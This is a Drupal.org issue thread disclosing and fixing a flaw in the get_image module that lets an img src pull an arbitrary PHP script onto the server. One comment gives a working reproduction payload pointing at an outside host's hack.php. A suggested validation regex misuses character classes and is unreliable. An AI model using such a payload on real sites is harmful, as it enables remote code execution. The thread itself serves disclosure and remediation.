Hi,

let me first state that Drupal Security Team approved this as a public issue, since this is a beta release module.

This module posses a high risk to anybody using it since you might be able to inject a PHP skript into the img src and let the module download it. You don't utilize any checks against this. You should validate that this file is indeed an image and not an arbitrary script.

Also, I believe this would be much better implemented as an text filter rather than hook_node.

Please do not release any other versions of the module until you fix this.

Jakub Suchy
Drupal Security Team

Comments

eastcn’s picture

eastcn commented
Status: Active » Needs review

this is a patch, strict check the file type.

superfedya’s picture

superfedya commented

The link doesn't work. My site was hacked and in image_save folder I found file like a "f8cbf1bb98a12b9f027516b53048e832.php_id=293&mode=view". It's normal?

andyhu’s picture

andyhu commented
Version: 6.x-1.0-beta5 » 7.x-1.0-beta1
Status: Needs review » Active

PLEASE DO NOT USE THIS MODULE ON PRODUCTION SITE, it's got very serious security issues! Anyone who installed this module can easily get hacked so that hackers can upload any php code to the server and get FULL PHP EXECUTION PERMISSION on your site!
Try edit the node with the content type handled by get_image and input <img src="http://drupaler.cn/hack.php" /> to prove it. After get_image module downloaded this script(hack.php) to your files folder, when you execute it, it will show the server time using echo time() .

David_Rothstein’s picture

David_Rothstein commented

Since this vulnerability is serious and has existed for a while, @greggles created an issue at #1462924: update project page to link to critical security issue and warn users to put a warning on the project page until it is fixed.

superfedya’s picture

superfedya commented

andyhu, even if I'll include a htaccess?

<Files "\.php">
Order deny, allow
Deny from all
</Files>
superfedya’s picture

superfedya commented

OK I uploaded this hack.php and yes, getimage uploaded it X_______X
But my .htaccess protect it from running :)

What else I need to add to my htaccess?
.php .html .pl .asp ?

superfedya’s picture

superfedya commented

this is a patch, strict check the file type.

The link doesn't work :(

alan d.’s picture

alan d. commented

For starters, why not check the file extension in the preg_match!

ie: preg_replace_callback('/......\.[png|jpeg|jpg|gif]/') or similar.

This appears wrong: '/(<img.*?src=["|\'])(.*?)["|\']/ms' as the ".*" would go past the end of the image tag (I'm not a regexp expert). I would be worried about the ["|\'] bit too.

Maybe just something like (fully expanded for clarity, you should be able to reduce it down a bit):

/<img [^>]*src="([^"]*\.[png|jpeg|jpg|gif])"[^>]*>|<img [^>]*src=\'([^\']*\.[png|jpeg|jpg|gif])\'[^>]*>/

superfedya’s picture

superfedya commented

Any patch?

Thanks

eastcn’s picture

eastcn commented
Status: Active » Fixed

try 7.x-1.0-beta2 Strict inspection image type:

$info = image_get_info($filepath);
if (!empty($info['width'])) {
.........
}
superfedya’s picture

superfedya commented

Even for 6.x version?

andyhu’s picture

andyhu commented
Status: Closed (fixed) » Fixed

For anyone who wants to cache local image files in the node, please check another module which is more secure:
http://drupal.org/project/image_resize_filter

Status: Fixed » Closed (fixed)

Automatically closed -- issue fixed for 2 weeks with no activity.

Status: Fixed » Closed (fixed)

Automatically closed - issue fixed for 2 weeks with no activity.